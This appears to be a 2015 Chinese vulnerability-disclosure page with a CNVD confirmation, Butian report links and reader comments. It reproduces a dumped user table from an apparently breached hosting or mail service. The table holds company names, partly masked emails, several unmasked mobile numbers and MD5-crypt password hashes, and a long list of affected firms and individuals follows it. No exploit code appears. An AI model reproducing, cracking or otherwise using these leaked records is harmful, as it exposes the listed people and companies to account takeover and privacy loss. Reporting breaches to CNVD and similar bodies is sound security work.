|<br> | 100200291 | 0 | 沧州华升精密铸造有限公司 | 0 | 0 | hsjz@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$KXo9fkn1$TwpD4LO/EWGg9vLmKu.bQ1 | 2 | 0 | 2011-05-06 14:29:13 | 0 | <blank> | user100200291 |<br> | 100200298 | 0 | 北京金陶洁具有限公司 | 0 | 0 | mark@**.**.**.** | 1 | 36 | 13716517130 | 1 | 1 | 2 | $1$6gPWhLGT$tcvU.sgWFmnAsj6e6UY/k. | 2 | 0 | 2014-01-08 09:42:11 | 4 | **.**.**.** | user100200298 |<br> | 100200324 | 0 | 北京悦目堂设计摄影有限公司 | 0 | 0 | ymt@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$bTlbgLTf$GbL7DYVHl/epR3S8lUi5k. | 1 | 0 | 2011-01-26 13:35:00 | 0 | <blank> | user100200324 |<br> | 100200336 | 0 | 上海舒伯哈特工具有限公司 | 0 | 0 | webmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$aHWFbVb3$WHZ7AoIOnk/25uYL0qO.e1 | 1 | 0 | 2008-05-09 15:52:41 | 0 | <blank> | user100200336 |<br> | 100200346 | 0 | 北京泽瑞华烨财税咨询有限责任公司 | 0 | 0 | 25016831@**.**.**.** | 1 | 119 | 18501379751 | 1 | 1 | 0 | $1$kSjLl3cq$NRHlRQH.K.2BS0.XXIclc/ | 1 | 0 | 2015-04-13 11:36:20 | 15 | **.**.**.** | user100200346 |<br> | 100200350 | 0 | 北京市桑普技术公司 | 0 | 0 | webmaster@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 0 | $1$lzG0UG9q$q2AUXLr5bsmXiUIA1zn3U1 | 1 | 0 | 2014-05-14 09:47:51 | 6 | **.**.**.** | user100200350 |<br> | 100200351 | 0 | 北京中冶迈克液压有限责任公司 | 0 | 0 | webmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 2 | $1$Zx24usBk$HEEV8sWv0hymUHNxbOrV00 | 2 | 0 | 2009-07-15 17:20:35 | 0 | <blank> | user100200351 |<br> | 100200356 | 0 | 中国国际航空旅行网 | 0 | 0 | botel@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$tXzfYYbr$maBxQN4gBckFmFOfvKVkD1 | 2 | 0 | 2004-04-28 09:11:05 | 0 | <blank> | user100200356 |<br> | 100200357 | 0 | 北京伊济源面神经学研究院 | 0 | 0 | chuzhenyun@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$hYpAE0yd$IMULA/DQhr4/fvWpz9Z650 | 1 | 0 | 2014-12-12 14:32:06 | 9 | **.**.**.** | user100200357 |<br> | 100200363 | 0 | 唐山晶源裕丰电子股份有限公司 | 0 | 0 | jyit@**.**.**.** | 1 | 36 | 13473445362 | 1 | 1 | 2 | $1$gzx6XsHi$zskEBxK1PCoUccwCWfrOk. | 1 | 0 | 2013-11-12 10:16:51 | 2 | **.**.**.** | user100200363 |<br> | 100200392 | 0 | 北京泛华资讯经贸有限公司 | 0 | 0 | webmaster@**.**.**.** | 1 | 39 | <blank> | 1 | 1 | 0 | $1$eny1xAz0$b36hUxG4bQNng8/u0WqVw/ | 2 | 0 | 2000-05-13 16:54:58 | 0 | <blank> | user100200392 |<br> | 100200395 | 0 | 中国国际技术智力合作公司 | 0 | 0 | xiaoyuming@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 3 | $1$JzRo5tQh$bE0IyNYDTAsoviEd1W710/ | 1 | 0 | 2015-04-21 16:45:28 | 2 | **.**.**.** | user100200395 |<br> | 100200403 | 0 | 协和药业有限公司 | 0 | 0 | liupengtao8533@**.**.**.** | 1 | 36 | 18910321702 | 1 | 1 | 0 | $1$i0MiY7Kq$9Fv9BqvgB4eefCG9vWTaa. | 2 | 0 | 2010-06-25 13:21:19 | 0 | <blank> | user100200403 |<br> | 100200409 | 0 | 北京瑞星衡包装彩印有限公司 | 0 | 0 | rxh@**.**.**.** | 1 | 119 | 13661197150 | 1 | 1 | 0 | $1$Jdly5OXE$wDhegKUwGdU1MPxel1uJz1 | 1 | 0 | 2015-08-25 11:29:41 | 10 | **.**.**.** | user100200409 |<br> | 100200416 | 0 | 北京神州新桥科技有限公司 | 0 | 0 | gaozzh@**.**.**.** | 1 | 37 | <blank> | 1 | 1 | 0 | $1$DoPwQJpb$dU1bCas54kIbc.nJVWbxJ0 | 1 | 0 | 2015-09-01 16:01:46 | 53 | **.**.**.** | user100200416 |<br> | 100200421 | 0 | 中国国际文化交流中心 | 0 | 0 | denglina@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$8HsDAChy$qH6EgOHRI60SgBmWPjlQp0 | 1 | 0 | 2015-08-25 16:42:36 | 12 | **.**.**.** | user100200421 |<br> | 100200440 | 0 | 北京奥得赛化工有限公司 | 0 | 0 | zkswinner1979@**.**.**.** | 1 | 36 | 13911035806 | 1 | 1 | 0 | $1$xde4mIsk$aqdopMafUOVxxbLMJPaJm1 | 2 | 0 | 2009-07-10 14:46:57 | 0 | <blank> | user100200440 |<br> | 100200442 | 0 | 山西汇镪磁性材料制作有限公司 | 0 | 0 | 94528218@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 0 | $1$NHVqIE7r$nuu/e8bTZZYXj59jexg7s0 | 1 | 0 | 2015-04-27 09:58:51 | 9 | **.**.**.** | hqgs |<br> | 100200456 | 0 | ShangHaiFortureCeramicCo.,Ltd | 0 | 0 | 11888118@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$KLATwR4d$BckJuJEEqyI6jcJ26JzDL. | 1 | 0 | 2015-09-01 11:35:35 | 17 | **.**.**.** | user100200456 |<br> | 100200457 | 0 | 北京鼎盛隆科技发展中心 | 0 | 0 | webmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$HIMjPz61$MtXdcSyx1Bi2Vw6XZLsyR/ | 2 | 0 | 2004-11-24 10:34:02 | 0 | <blank> | user100200457 |<br> | 100200471 | 0 | 太原重型机械(集团)有限公司 | 0 | 0 | webmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$n8v2x7VI$cL/WRkf8l7M4xYjz5SMK.. | 2 | 0 | 2004-08-10 18:26:46 | 0 | <blank> | user100200471 |<br> | 100200472 | 0 | 航天材料及工艺研究所 | 0 | 0 | zpl@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$3wu871IA$RlznEjTP/XyLy47Af3du0/ | 2 | 0 | 2005-12-09 09:17:26 | 0 | <blank> | user100200472 |<br> | 100202514 | 0 | 北京世纪桥国际商贸公司 | 0 | 0 | liqing@**.**.**.** | 1 | 36 | 13701392800 | 1 | 1 | 0 | $1$qMzaHNSS$tnO7SC7.53.YylAPA7gyn1 | 2 | 0 | 2009-08-20 16:00:33 | 0 | <blank> | user100202514 |<br> | 100202521 | 0 | 中国摄影杂志 | 0 | 0 | lile@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 0 | $1$ECe0atyW$HkFWbCkbOpvwrVJPLkR8x/ | 1 | 0 | 2014-07-16 16:54:54 | 4 | **.**.**.** | cphoto |<br> | 100202538 | 0 | 中国浦发机械工业股份有限公司 | 0 | 0 | xfmei@**.**.**.** | 1 | 39 | <blank> | 1 | 1 | 0 | $1$Gpb9ozW8$JYp0xCAi3CzkRDw181p0u. | 2 | 0 | 2013-11-03 15:06:57 | 7 | **.**.**.** | user100202538 |<br> | 100202544 | 0 | 北京碧水庄园房地产开发公司 | 0 | 0 | postmaster@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 0 | $1$FLCwoAE8$8K2bYPwXrV0i2u.r5.Jm/0 | 1 | 0 | 2015-08-27 15:48:47 | 25 | **.**.**.** | user100202544 |<br> | 100202545 | 0 | 北京炎黄艺术国际推广有限公司 | 0 | 0 | webmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$NWY6hKP4$G/vFhekdviLOGevDWtKLn1 | 2 | 0 | 2011-09-07 11:22:00 | 0 | <blank> | user100202545 |<br> | 100202553 | 0 | 理学电企仪器(北京)有限公司 | 0 | 0 | wangcx@**.**.**.** | 1 | 37 | <blank> | 1 | 1 | 1 | $1$uxFyRUGh$x70zLk9Eqbqzs/ECnBXOe1 | 1 | 0 | 2014-11-04 15:07:48 | 2 | **.**.**.** | user100202553 |<br> | 100202558 | 0 | 中国传统食品公司 | 0 | 0 | wh@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$9jflLATf$MJmHP1ZhmigQjz3RJkEvO. | 2 | 0 | 2010-01-22 15:42:18 | 0 | <blank> | user100202558 |<br> | 100202574 | 0 | 中国国际贸易公司船舶部 | 0 | 0 | ray@**.**.**.** | 1 | 37 | <blank> | 1 | 1 | 0 | $1$YtqpXNli$2FjhTZP6Da6A8vf0wTzP7. | 2 | 0 | 2014-02-17 15:37:04 | 3 | **.**.**.** | user100202574 |<br> | 100202581 | 0 | 蚌埠双环电子有限公司 | 0 | 0 | tyb@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$nP2YyzhU$VTmYO/UUmXXvuEZ0PV/pG0 | 1 | 0 | 2015-05-19 16:12:00 | 3 | **.**.**.** | user100202581 |<br> | 100202586 | 0 | 北京杂技团 | 0 | 0 | douht@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$U05ymQxG$UfSa3N1KXWi8QZ0Tumd2F0 | 2 | 0 | 2011-06-03 11:19:21 | 0 | <blank> | user100202586 |<br> | 100202590 | 0 | 北京住力电通科技有限公司 | 0 | 0 | wangyan@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$Wr3JUYzM$8SbqVgsEGgv57kIbOLt6d1 | 1 | 0 | 2011-08-22 11:12:23 | 0 | <blank> | user100202590 |<br> | 100202591 | 0 | 上海双星箱包有限公司 | 0 | 0 | webmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$bZhe9Eqt$mlRO1FJkEmJUHjhJ6bqZX0 | 2 | 0 | 2009-09-16 14:51:43 | 0 | <blank> | user100202591 |<br> | 100202593 | 0 | 北京锦绣大地农业股份有限公司 | 0 | 0 | cfda2002@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 2 | $1$JCg8da3V$T5voZmgowtcd6W9L6SOZY/ | 1 | 0 | 2015-08-30 17:11:54 | 4 | **.**.**.** | user100202593 |<br> | 100202599 | 0 | 北京新世纪科发数码技术有限公司 | 0 | 0 | 25681731@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$My8NEKVr$TOhDznWqRZa1Ojyipljda. | 1 | 0 | 2014-09-15 20:25:39 | 9 | **.**.**.** | user100202599 |<br> | 100202600 | 0 | 北京蓝摇惠好乐器有限公司 | 0 | 0 | ly2@**.**.**.** | 1 | 37 | <blank> | 1 | 1 | 0 | $1$6mRrPuyV$yFrejtzAHNu/MuDtuQHuB. | 2 | 0 | 2003-11-04 14:43:04 | 0 | <blank> | user100202600 |<br> | 100202615 | 0 | 首都医科大学宣武医院 | 0 | 0 | hucheng@**.**.**.** | 1 | 39 | <blank> | 1 | 1 | 2 | $1$fA9EUBtc$V/f5wTXoELhRNFpCI/s1U/ | 1 | 0 | 2015-08-29 22:01:09 | 22 | **.**.**.** | user100202615 |<br> | 100202616 | 0 | 中国移动通信集团浙江有限公司 |
部分企业--------------------------------------------+| 北京同晶锦程科技有限公司 || 北京金鑫远洋科贸有限公司 || 北京汇智时代科技发展有限公司 || 北京三虎志远光电通信技术有限公司 || 日东电子科技(深圳)有限公司 || 北京索旺达科技发展有限公司 || 北京金菱一科技有限公司 || 中国国际航空器材供应有限公司 || 北京汽车服务有限公司 || 北京六合生科技发展有限公司 || 北京市献血办公室 || 中国纸业投资总公司 || 北京新康创业商贸有限公司 || 大连恒基电子技术有限公司 || 地寳轩 || 爱信精机(中国)投资有限公司 || 天津市莱姆达尔科技发展有限公司 || 上海创灏电子科技有限公司 || 北京华融兴商资本管理有限公司 || 北京普莱维斯电子科技有限公司 || 上海连成泵业制造有限公司北京分公司 || 张华华 || 天津市京津农药厂 || 北京龙福康科技发展有限责任公司 || 北京牡丹视源电子有限责任公司 || 东方网景内部测试 || 恩泊泰(天津)科技有限公司 || 北京拓展时代科技有限公司 || 殷晔 || 北京花嫁婚坊婚庆工作室 || 上海融军科技有限公司 || 财税代理1 || 张自鹏 || 北京云欢传媒广告有限公司 || thy || jmit || 黑龙江 || 河北镔鑫企业形象策划有限公司 || 北京天健源达科技有限公司 || 南通云翔机械制造有限责任公司 || 北京首钢冷轧薄板有限公司 || 北京润物管理咨询有限公司 || 美华国际货运有限公司 || 武汉市卓创电子科技有限公司 || 上海富均文化传播有限公司 || 北京迪美德尔科技有限公司 || 美国RAZOR上海代表处 || 北京清源保生物科技有限公司 || 昌吉回族自治州人民政府办公室 || 上海万杰电子技术发展有限公司 || 上海久岳化工有限公司 || 以色列大使馆 || 北京天久凯泰化工科技有限公司 || 北京天晟精化科技发展有限公司 || 日东机械技术中心有限公司 || 迪克斯汽车电器(上海)有限公司 || 北京市三信律师事务所 || 北京三所光电科技有限公司 || 季威 || 刘伟婷 || 鄂尔多斯市茹意投资有限责任公司 || 新疆农鼎生物科技股份有限公司 || 北京市广学天梯教育 || 临床外科杂志 || 北京八方世纪科技有限公司 || 青岛郑庄实业总公司 || 北京国化精试咨询有限公司 || 法律出版社 || leon1 || 学校 || 王铮 || 张召桃 || 奥通博雅 || 马彪 || 洛阳瑞光影视光电技术有限公司 || 韩松电子 || 陈霰 || 北京鼎鑫润德科技发展有限公司 || 毛毛虫 || 凯泰特种纤维科技有限公司 || 上海意迅国际货物运输代理有限公司 || 北京中天联科微电子技术有限公司 || 中国气象局沈阳大气环境研究所 || 《植物营养与肥料学报》编辑部 || 梁 晓园 || 启东市佳顺有限责任公司 || 北京中微恒业商贸中心 || 北京奥林之星科贸有限公司 || 北京毕捷电机股份有限公司 || 北京安通纵横家居用品有限责任公司 || 北京瓦控电气技术有限公司 || 北京盛胜税务师事务所有限责任公司 || 北京中物理想房地产开发有限公司 || 中国土产畜产进出口总公司中土畜广告咨询公司 || 北京昊普创业安全防范技术有限公司 || 北京三全公寓有限公司 || 上海润辉实业有限公司 || 得天公司 || 北京长海星缘科技开发有限公司 || 赤城飞行小镇旅游开发有限公司 || 内蒙古鄂尔多斯服装有限公司1 || 北京瑞传信通科技有限公司 || 苏州高腾科技有限公司 || 纳福 || 信用时代传媒文化(北京)有限公司 || 北京语言大学教育测量研究所 || 中国奶业协会 || 北京华祥兔业有限责任公司 || 东方艺术大厦有限公司北京希尔顿酒店 || 亿百媒会展(上海)有限公司 || 王智宏 || 天津中节能智能玻显科技有限公司 || 盛寰宇洲(北京)文化传播有限公司 || 徐溢澤 || wshu || 蔺超 || 历史帝国1 || 贺树昌 || 北京康华伟业孵化器有限责任公司 || lqycims || 峰尚科技 || 北京绘本原创教育科技有限公司 || 慈勤哲个人 || 吴彬 个人 || 北京紫玉山庄房地产开发有限公司 || 欧讯国际(香港)有限公司 || 梅梨国际贸易(上海)有限公司 || 北京利达众业科贸有限公司 || 宁波东方艺术品有限公司 || 北京四维益友科技有限公司 || 威迪克(北京)网络技术有限公司 || 华声报(电子版)社 || 青岛新动力木业机械制造有限公司 || 上海悠瑞机电涂装工程设备有限公司 || 德意志学术交流中心驻京办事处 || 阿罗科咖啡焙制(北京)有限公司 || 上海赛格复合材料有限公司 || 北京珊瑚岩影视广告有限公司 || 陕西御工坊文化发展有限公司 || 唐玺名人会馆 || 北京五方天雅汽配城市场有限责任公司 || 日本株式会社塚谷刃物制作所上海代表处 || 神州慧康(北京)科技有限责任公司 || 李道根 || 华能新能源股份有限公司 || 浙江内曼格机械制造有限公司 || 北京天基新材料股份有限公司 || 北京建筑工程技术研究中心 || 中国印刷及设备器材工业协会 || AVIGMBH || 于涛 || 天津市科学学研究所-办公室 || 满洲里中林科技干燥设备有限公司 || 李安珩 || 华清阳光教育科技中心 || 新势瀚海(北京)国际广告有限公司 || 蔡扬名 || 满都拉 || 北京海德润康商贸有限公司 || 上海革浩餐饮有限公司 || 美科美仁科技(北京)有限公司 || 田生生 || 上海旭洲物流有限公司 || 北京川江仪表技术开发中心 || 北京学易通互动科技有限公司 || 意大利通用磁力有限公司北京代表处 || Biamp Systems Corporation || 平实嘉国际咨询(北京)有限公司 || 中国电子仪器行业协会 || 新加坡通日技术私人有限公司上海代表处 || 北京昊鼎物流科技有限责任公司 || 北京麦思德装饰工程有限公司 || 深圳市捷诺尔科技开发有限公司 || 北京博朗特科技有限公司 || 北京恒顺维远科技有限公司 || 北京万控科技有限公司 || 北京科日新电子技术有限责任公司 || 上海电信设备配件厂 || 卢森堡海格投资有限公司广州代表处 || 北京明慧茶院有限公司 || 上海祥佑数码科技有限公司 || 新疆昌吉回族自治州旅游局 || 荷丰(天津)化工工程有限公司 || 北京权品品牌管理有限责任公司 || 上海新侨职业技术学院 || 宜昌红人广告有限责任公司 || 北京庞体文化艺术中心 || 北京汇众易店电子有限公司 || 北京国际<sos>救援中心 || 北京中新雅视文化发展有限公司 || 北京冕宸广告公司 || 首都医科大学宣武医院 || 芜湖长信电子有限公司 || Dapeng Liu || 杨先生杨先生 || 中航农科 || 天津大日隆翔国际货运代理有限公司 || 北京恩维欧达能源科技有限公司 || 沈丹阳 || 吴明 || 河南瑞度石业发展有限公司 || 天津宏润家具有限公司 || 中化国际咨询公司 || 天津市妙众堂保健食品技术开发有限公司 || 山西易兴机械有限公司 || 北京通达航空服务部 || 李彦超个人 || 北京中天联科科技有限公司 || 淄博畅安陶瓷科技有限公司 || 中国科学院微生物研究所 || 北京峻显峰机电设备技术服务有限公司 || 数字生活杂志社 || 上海411医院骨科 || 北京博辉在线科技发展有限公司 || 淄博张店鹤鸣色釉料厂 || 北京铁路信号有限公司 || 新乡市天丰振动机械厂 || 温州肯比焊接设备有限公司 || 北京万德特机电技术研究所 || 中国地质学会 || 廖思华 || 北京标杆网络技术有限公司 || 北京市千歌装饰工程有限公司 || 昆明市五华区古古珠宝玉器店 || 中国科学院物理研究所 || 广州市图凸服装设计有限公司 || 上海成瑞投资有限公司 || 济源市安全生产监督管理局 || 北京利和贞科技有限公司 || 北京读图时代文化 || 天津康德莱医疗产品有限公司 || 深圳市国际商务经济发展有限公司 || 冯放辉冯放辉 || 北京起重运输机械设计研究院 || jda || 首泰金信(北京)股权投资基金管理有限公司 || 李静海 || 左仲生 || 融通智成(北京)国际品牌顾问有限公司 || 江苏金地电气有限公司 || 李护法 || 成鑫盈通 || 光哥哥 || 北京联天兴荣信息技术有限公司 || 天津格锐培生教育 || 陈庆安 || 北京耘生成科技有限公司 || 北京恒电迪泰电子有限公司 || 卡尔拉得优胜汽车修复系统(北京)有限公司 || 上海乾永包装设计服务有限公司 || 北京畅通达通信技术有限公司 || 瑞典亚洲集运有限公司北京办事处 || 北京盈信阳光生物技术有限公司 || 北京爱佳卫生保健品厂 || 北京尤尼帕斯控制系统技术开发有限公司 || 上海砾阳软件有限公司 || 上海市徐汇区莉莉花苑 || 上海茂鸿国际货运有限公司 || 上海礼羚实业有限公司 || 青岛益群美亚公司 || 天菱 天菱 || 北京百年恒丰技术有限公司 || 北京博兴科源电子技术有限公司 || 王学君王学君 || 国家标准化管理委员会标准信息中心 || 北京三辰投资基金管理有限公司 || 李秀花 || 中润锦尚(天津)股权投资基金管理有限责任公司 || 双城市绝缘制品有限责任公司 || 北京安创世纪电子技术有限公司 || 曹骏 || 中国国土经济学会 中国生态文化协会名山分会 || 上海富荣工业加热设备有限公司 || 北京英瀚环保设备有限公司 || 北京意迪恩广告制作有限公司 || 袁伟 || 北京世奥得体育用品有限责任公司 || luciferkim || 倒萨 || 余宗建 || 北京东讯创新科技有限公司 || 陈键锋 || wangting || SKK || 郑州壹吾味商贸有限公司 || 中国电信股份有限公司北京分公司 || 北京东方正通科技有限公司 || 中冶赛迪集团有限公司 || 北京华夏古泉艺术品有限责任公司 || 北京博大精深国际旅行社有限责任公司 || 天津科林斯凯环保科技有限公司 || 北京尔康医院 || 胜威诺国际货运代理(上海) 有限公司厦门分公司 || 上海启洋计算机科技有限公司 || 影响传媒有限公司 || 北京护士学校 || 北京时讯创通科技有限公司 || 上海用心计算机科技有限公司(代理) || 北京市中美特新医疗用品有限责任公司 || 北京金怡和商务顾问有限公司 || 江阴市界达特异制管有限公司 || 上海大洋汽车空调配件有限公司 || 无锡众志和达存储技术有限公司 || 北京建工金源环保发展有限公司 || 瞬联讯通科技(北京)有限公司 || 北京康比特体育科技股份有限公司 || 刘阳 || 和玄国际货物运输代理(上海)有限公司 || 北京奕和胜信息咨询有限公司 || 天津天飞食品贸易有限公司 || 苏江奎 || 丁飞 || 北京朗波尔光电股份有限公司 || 北京东方中科集成科技股份有限公司 || 北京新奥特集团有限公司 || 北京威福斯机电设备有限公司 || 北京锦绣大地农业股份有限公司 || 泽尔曼生物能源技术(北京)有限公司 || 亚新科美联(廊坊)制动系统有限公司 || 北京东华原医疗设备有限责任公司 || 翼隆国际有限公司 || 简竹锋 || 卞湧文 || hui || 张学民 || 会员测试的1 || 新发线缆有限公司-天津销售处 || 环球风尚(北京)广告有限公司 || 泛姆泰克(天津)户外运动用品有限公司 || 江苏迪恩杰电子有限公司 || 北京邮电大学 || 北京市铭泰热力供应有限责任公司 || 易林怡航船务 || 安视维(北京)科技有限公司 || 上海鑫鼎国际货物运输代理有限公司 || 《癌变·畸变·突变》编辑部 || 北京吉娜依达服饰有限公司 || 胡青山 || 一方投资咨询服务有限公司 || 北京中电怡平科技发展有限公司 || 北京和平宾馆 || 上海仙丰信息技术有限公司 || 北京金考复印服务有限公司 || 爱特电子石油系统装备(北京)有限公司 || 北京市恒镒抛光页轮厂 || 刘凤明刘凤明 || 上海易传电子科技有限公司 || 北京清大华创科技发展有限公司 || 赵健平 || 北京立方创新产品设计有限公司 || 北京佳华储良科技有限公司 || 北京鼎吉装饰设计有限公司 || 北京唐字头影视影业拍摄基地 || DMA International Co. || 青岛百川泰科软件有限公司 || 美国DRG国际有限公司北京代表处 || 中国石化咨询公司 || 郑文友中医肿瘤医院 || 莫淑珍莫淑珍 || 深圳市冠奥通康体实业有限公司 || 大连交流岛信息有限公司 || 深圳前海翀鑫投资基金管理有限公司 || 北京精信智创科技有限公司 || 叶荣乐 || 深圳市金誉天城贸易有限公司 || 黄石 || 普宁市琪斯贸易有限公司 || 鲁商联盟(北京)投资基金管理有限公司 || 周名扬 || 北京立敦创业技术发展有限公司 || 北京国泰创业投资有限公司 || 北京荷丰远东技术有限公司 || 南京法语培训中心 || 北京伟煜道诚投资顾问有限公司 || 无锡普瑞精密技术有限公司 || 黄石市装饰协会 || 北京市宏达振兴电梯安装有限公司 || 北京大千华瑞(国际)广告公司 || 上海隆伟贸易有限公司 || 华冠实业总公司 || 格劳博机床维修(北京)有限公司 || 北京古诺凡希家具有限公司 || 广西强寿药业集团有限公司 || 李民李民 || 上海火炬润滑油有限公司 || 北京东方嘉宏机电技术有限责任公司 || 北京宏怀房地产开发有限公司 || 中演制作公司 || 中航技国际租赁有限公司 || 邹鹏飞 || 吕学英 || 北京檀明咨询有限公司 || 北京亿科瑞土规划设计有限公司 || 文应烈 || 潍坊高新技术产业开发区网络中心 || 北京并行科技有限公司 || 沁阳市财政局 || 北京城建设计发展集团股份有限公司 || 北京智德典康电子商务有限公司 || 山西省众立法兰有限公司 || 超级玛丽 || 北京爱腾科技有限公司 || 晋中市特种设备监督检验所 || 晨智 || 迷丝布贸易(上海)有限公司 || 莫继强 || 昆山比勒恩机械有限公司 || 李洁净 || boston tech || 上海百祁灵贸易有限公司[停用] || 天津森宇百川工程管理咨询有限公司 || 朱江 || 北京博纳伟业市场营销有限公司 || 易映华夏(北京)教育科技有限责任公司 || 北京智腾泰达科技有限公司 || 北京伟康世纪医疗科技有限公司 || 海宁市亮歌汽车部件有限公司 || 深圳市南山区中和商行 || 北京华清润德科技有限公司 || 中国大冢制药有限公司 || 北京亚科特软件技术有限公司 || 东洋电化工业株式会社北京事务所 || 哈尔滨地图出版社 || 慧合科技股份有限公司 || 北京中本科技开发有限公司 || 俊龙 俊龙 || 陶中 陶中 || 中国石油教育学会 || 北京凌奇印刷有限责任公司 || 常熟市双杰测试仪器厂 || 北京泰来华顿低温设备有限公司 || 北京零度智慧科技有限公司 || 瑞祺通电子有限公司 || 加拿大干细胞技术有限公司北京代表处 || 天津市金郁华商贸有限公司 || 天津三华国际贸易有限公司 || 王京立 || 北京意达宇通科技发展有限责任公司 || 北京夕阳红文化发展有限公司 || 日本经济协会北京事务所电子原子力室 || 中国质量万里行促进会 || 北京杂技团 || 天津中油机润科技有限公司 || 雅芙小店 || 联合国中国 UNDP || 黄乾亨黄英豪律师事务所 || 祖军 || dace1234 || 于潜 || Banny Ni || 西安思必得实验室设备有限公司 || 标新科技(北京)有限公司 || adsfasdfasdf || 天津市河东区福东小学 || 至诚远信(北京)科技发展有限公司 || THE CPS ENTERPRISE LTD || 王 琦 个人 || 李利凯 || 中国食品科学技术学会运动营养食品分会 || 先导(益阳)等离子粉末有限公司 || 北京鑫旺路桥建设有限公司 || 北京中永基固化剂科技发展有限公司 || 北京市劳动信息中心 || 雅洁(苏州)超静科技有限公司 || 北京市私立树人学校 || 宝信(中国)有限公司北京代表处 || 山东省菏泽市师专附中 || 中闻律师事务所 || 上海涛加新材料工贸有限公司 || 北京青木宝盾科技有限公司 || 大宇资讯股份有限公司 || 上海育港电子科技有限公司 || 北京利恩和通讯技术有限责任公司 || 张家港市剑泉工具制造有限公司 || 上海森库企业投资管理咨询有限公司 || 宁波新安健进出口有限公司 || 北京伯仲佳和石油技术开发有限公司 || 中共得荣县委宣传部 || 北京索迪分众营销策划有限公司 || 李真 || 美国超力公司北京办事处 || 何穆庚何穆庚 || 北京宜世通信息技术有限公司 || 海蓝凯悦(北京)信息技术有限公司 || 银泰资源股份有限公司 || 莫名 || inewcos || 天津市滨海新区众爱美甲服务部 || 北京市瑞世兴科科技有限公司 || 北京表库时代贸易有限公司 || 益阳市综合职业中专 || 邓超界 || 张枫楠 || 天津市同方典当有限责任公司 || 长视电子 || 天威诚信 || 北京宝典工艺制品有限公司 || 北京嘉世行房地产经纪有限公司 || 公路交通科技杂志社 || 香港分子仪器有限公司上海代表处 || 朱峰 || 陈晓东 || 北京天平国际旅行社 || 北京康达光学仪器有限公司 || 北京市疾病预防控制中心 || 北京电伴热科技发展有限公司 || 北京联软信息技术有限公司 || 中国医药设备工程协会 || 中国感光学会 || 浙江省东阳市虎鹿振华缝纫设备批发部 || 北京禹辉水处理技术有限公司 || 北京城建五维市政工程有限公司 || 旭格国际建材(北京)有限公司 || 北京飞扬印刷技术有限责任公司 || 青岛润德恒丰国际贸易有限公司 || 中国证券登记结算有限责任公司 || 六安市大禹医疗器械有限责任公司 || 萨捷国际物流有限公司 || 友升基业(北京)投资管理有限公司 || 北京远大都教育咨询中心 || 北京四海广达科技有限公司 || 北京圣彩虹文化艺术发展有限责任公司 || 海宁广源化纤有限公司 || 北京市嘉荣嘉画平面设计有限公司 || 泛华建设集团有限公司 || 北京东屹鼎世科技有限公司 || 北京睿德力商务咨询有限公司 || zhexu zhan || 天津市帝思嘉物业服务有限公司 || 德驰(天津)科技有限公司 || 普 蕊 斯(上海)医药科技开发有限公司 || 裴建强 || 方圆标志认证集团有限公司 || 仁德和 || 雷伟 || 周光兵 || songyang || 上海弘冠光能科技有限公司
危害等级:高
漏洞Rank:20
确认时间:2015-09-07 08:32
CNVD确认漏洞风险点(对于白帽子所述影响情况,持保留意见,未必就有虚拟主机,影响还需要重新评估),已由CNVD通过网站公开联系渠道向其邮件通报。
暂无
标题是在太长了,其他内容放在简要描述了,白帽子不要恨俺。
https://butian.360.cn/vul/info/qid/QTVA-2015-293822
https://butian.360.cn/vul/info/qid/QTVA-2015-293822
https://butian.360.cn/vul/info/qid/QTVA-2015-293822
https://butian.360.cn/vul/info/qid/QTVA-2015-293822
https://butian.360.cn/vul/info/qid/QTVA-2015-293822
哥们
你真 6666
@疯狗 问个问题,等待审核的bugid,是不是跟审核通过之后的bugid是一样的
https://butian.360.cn/vul/info/qid/QTVA-2015-293822补天那边已经查出来了
描述也不改 真是6啊
https://butian.360.cn/vul/profile/uid/2833792 炼石_清 发布一个匿名漏洞 ¥2000 2015年08月31日 @疯狗
原文连接
的情况下转载,若非则不得使用我方内容。